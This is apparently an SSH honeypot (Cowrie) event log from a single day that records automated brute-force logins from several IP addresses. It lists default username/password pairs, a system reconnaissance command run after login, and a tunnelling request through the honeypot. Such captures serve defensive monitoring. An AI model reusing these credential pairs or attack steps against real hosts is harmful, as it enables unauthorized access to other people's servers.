{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T11:30:22.503387Z","src_ip":"212.227.235.229","session":"a082d0ea854f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:30:22.976042Z","src_ip":"212.227.235.229","session":"a082d0ea854f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T11:30:23.134062Z","session":"a082d0ea854f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32942,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d37ad26426c","protocol":"ssh","message":"New connection: 212.227.125.160:32942 (1.2.3.4:22) [session: 0d37ad26426c]","sensor":"my-vps","timestamp":"2025-08-26T11:30:25.255031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:25.256257Z","src_ip":"212.227.125.160","session":"0d37ad26426c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:25.319254Z","src_ip":"212.227.125.160","session":"0d37ad26426c"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:30:25.615702Z","src_ip":"212.227.125.160","session":"0d37ad26426c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:30:26.083110Z","src_ip":"212.227.125.160","session":"0d37ad26426c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:30:26.083776Z","src_ip":"212.227.125.160","session":"0d37ad26426c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:26.179397Z","src_ip":"212.227.125.160","session":"0d37ad26426c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:26.180639Z","src_ip":"212.227.125.160","session":"0d37ad26426c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33712,"dst_ip":"1.2.3.4","dst_port":22,"session":"4de96d38d732","protocol":"ssh","message":"New connection: 212.227.125.160:33712 (1.2.3.4:22) [session: 4de96d38d732]","sensor":"my-vps","timestamp":"2025-08-26T11:30:31.528496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:31.537338Z","src_ip":"212.227.125.160","session":"4de96d38d732"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:31.579139Z","src_ip":"212.227.125.160","session":"4de96d38d732"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:31.779826Z","src_ip":"212.227.125.160","session":"4de96d38d732"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:32.872084Z","src_ip":"212.227.125.160","session":"4de96d38d732"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":55150,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7789c4f3eae","protocol":"ssh","message":"New connection: 83.168.105.65:55150 (1.2.3.4:22) [session: e7789c4f3eae]","sensor":"my-vps","timestamp":"2025-08-26T11:30:32.916446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:32.917380Z","src_ip":"83.168.105.65","session":"e7789c4f3eae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:32.957647Z","src_ip":"83.168.105.65","session":"e7789c4f3eae"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:33.082115Z","src_ip":"83.168.105.65","session":"e7789c4f3eae"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:34.124609Z","src_ip":"83.168.105.65","session":"e7789c4f3eae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34478,"dst_ip":"1.2.3.4","dst_port":22,"session":"23f021847b2c","protocol":"ssh","message":"New connection: 212.227.125.160:34478 (1.2.3.4:22) [session: 23f021847b2c]","sensor":"my-vps","timestamp":"2025-08-26T11:30:37.350090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:37.350989Z","src_ip":"212.227.125.160","session":"23f021847b2c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:37.402153Z","src_ip":"212.227.125.160","session":"23f021847b2c"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:30:37.568067Z","src_ip":"212.227.125.160","session":"23f021847b2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:30:37.781531Z","src_ip":"212.227.125.160","session":"23f021847b2c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:30:37.782215Z","src_ip":"212.227.125.160","session":"23f021847b2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:37.848413Z","src_ip":"212.227.125.160","session":"23f021847b2c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:37.849630Z","src_ip":"212.227.125.160","session":"23f021847b2c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34832,"dst_ip":"1.2.3.4","dst_port":22,"session":"42c062bd3c8c","protocol":"ssh","message":"New connection: 196.251.86.249:34832 (1.2.3.4:22) [session: 42c062bd3c8c]","sensor":"my-vps","timestamp":"2025-08-26T11:30:41.989793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:42.606493Z","src_ip":"196.251.86.249","session":"42c062bd3c8c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:30:42.607250Z","src_ip":"196.251.86.249","session":"42c062bd3c8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35248,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b1e318082c5","protocol":"ssh","message":"New connection: 212.227.125.160:35248 (1.2.3.4:22) [session: 5b1e318082c5]","sensor":"my-vps","timestamp":"2025-08-26T11:30:43.236342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:43.237207Z","src_ip":"212.227.125.160","session":"5b1e318082c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:43.288089Z","src_ip":"212.227.125.160","session":"5b1e318082c5"}
{"eventid":"cowrie.login.failed","username":"dmdba","password":"dmdba","message":"login attempt [dmdba/dmdba] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:43.445296Z","src_ip":"212.227.125.160","session":"5b1e318082c5"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"qwerty","message":"login attempt [hadoop/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:44.386466Z","src_ip":"196.251.86.249","session":"42c062bd3c8c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:44.497236Z","src_ip":"212.227.125.160","session":"5b1e318082c5"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:45.945048Z","src_ip":"196.251.86.249","session":"42c062bd3c8c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":57002,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d94132f5a60","protocol":"ssh","message":"New connection: 83.168.105.65:57002 (1.2.3.4:22) [session: 8d94132f5a60]","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.585749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.586931Z","src_ip":"83.168.105.65","session":"8d94132f5a60"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.626464Z","src_ip":"83.168.105.65","session":"8d94132f5a60"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.747131Z","src_ip":"83.168.105.65","session":"8d94132f5a60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36016,"dst_ip":"1.2.3.4","dst_port":22,"session":"df14a494bc15","protocol":"ssh","message":"New connection: 212.227.125.160:36016 (1.2.3.4:22) [session: df14a494bc15]","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.799422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.800219Z","src_ip":"212.227.125.160","session":"df14a494bc15"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:30:48.844313Z","src_ip":"83.168.105.65","session":"8d94132f5a60"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.845011Z","src_ip":"83.168.105.65","session":"8d94132f5a60"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.850911Z","src_ip":"212.227.125.160","session":"df14a494bc15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.885315Z","src_ip":"83.168.105.65","session":"8d94132f5a60"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:48.886472Z","src_ip":"83.168.105.65","session":"8d94132f5a60"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test3","message":"login attempt [test3/test3] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:49.558959Z","src_ip":"212.227.125.160","session":"df14a494bc15"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:50.613280Z","src_ip":"212.227.125.160","session":"df14a494bc15"}
